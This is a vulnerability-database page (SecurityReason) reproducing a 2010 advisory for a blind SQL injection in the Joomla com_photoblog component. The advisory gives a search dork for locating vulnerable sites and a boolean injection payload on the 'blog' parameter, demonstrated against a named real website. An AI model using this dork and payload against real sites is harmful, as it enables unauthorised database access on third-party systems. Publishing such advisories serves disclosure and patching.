|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 7013 CVE : CVE-2010-0610 CWE : CWE-89 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : No Exploit Available : Yes Credit : ALTBTA Published : 13.02.2010
Advisory Content : Joomla (com_photoblog) Blind Sql Injection Vulnerability ======================================================== ####=#### .:. Author : ALTBTA [L_9@HoTmIL.CoM] .:. Home : v4-team.com/cc<http://v4-team.com/cc> .:. Script : Joomla .:. Download Script: http://webguerilla.net/downloads/3-components-for-joomla-1 .:. Bug Type : Blind Sql Injection .:. Dork : inurl:"com_photoblog" ##=##### ===[ Exploit ]=== www.site.com/detail.php?id=[Blind<http://www.site.com/detail.php?id=[Blind> SQL INJECTION] www.site.com/index.php?option=com_photoblog&view=images&category=1&celebs&b log=1+and<http://www.site.com/index.php?option=com_photoblog&view=images&ca tegory=1&celebs&blog=1+and> substring(@@version,1,1)=5 demo http://www.edhardybabyproducts.eu/index.php?option=com_photoblog&view=image s&category=1&celebs&blog=1+and%20substring%28@@version,1,1%29=5 >>> True http://www.edhardybabyproducts.eu/index.php?option=com_photoblog&view=image s&category=1&celebs&blog=1+and%20substring%28@@version,1,1%29=4 >>> False #=#### Greats T0: aB0-3tH4b T3rR0r & RxH References : http://xforce.iss.net/xforce/xfdb/56135
http://www.securityfocus.com/bid/38136
http://www.exploit-db.com/exploits/11337
http://packetstormsecurity.org/1002-exploits/joomlaphotoblog-bsql.txt  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |